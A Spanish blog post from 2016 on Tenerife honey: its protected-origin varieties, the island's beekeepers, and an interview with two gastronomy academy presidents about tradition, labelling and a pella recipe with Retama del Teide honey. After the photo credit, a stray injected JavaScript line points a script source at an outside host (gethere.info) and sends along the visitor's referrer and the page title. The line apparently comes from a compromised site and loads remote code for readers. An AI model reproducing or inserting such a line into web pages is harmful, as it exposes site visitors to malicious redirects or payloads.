¿Sabías qué?

28/10/2016

Extraction du Miel

¿Sabías que la miel tinerfeña es una de las mieles más preciadas de nuestro país? ¿Que en el Valle de la Orotava hay campos plagados de retamas y montes ricos en brezos? ¿Sabías que en Tenerife existen hasta 14 variedades distintas de miel? ¿Que estas 14 variedades son Denominación de Origen Protegida? ¿Que buena parte de la economía de la isla depende de los 600 apicultores aquí censados? ¿Que las mieles que aquí se producen son únicas en el mundo?

Pues sí. Tan únicas como interesantes: miel de flor de aguacate, miel de castaño, miel de hinojo, miel de brezal… De estas mieles nos hablan el presidente de la Real Academia de Gastronomía, Rafael Ansón Oliart, y el experto y presidente de la Academia de Gastronomía de Tenerife,  José Luis Zubieta:

Rafael- ¿Qué significado tiene la miel para los tinerfeños?

José Luis- La miel de Tenerife ha formado parte del acervo cultural de la isla desde que se tiene conocimiento escrito tras la conquista. La de Retama del Teide era muy apreciada, por lo que los apicultores cargaban las colmenas en bestias para subirlas al volcán.

Rafael- ¿Cómo se identifica la auténtica miel de Tenerife?

José Luis- Tiene Denominación de Origen Protegida, por lo que lleva una contraetiqueta que identifica su origen.

Rafael- ¿Y una receta local con miel que defina a Tenerife?

José Luis- Destacaría la pella (rulo de gofio con almendras fritas) con miel de Retama del Teide, acompañada de mojo rojo o verde. Como postre, con un vino dulce.

Foto | yves Tennevin

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO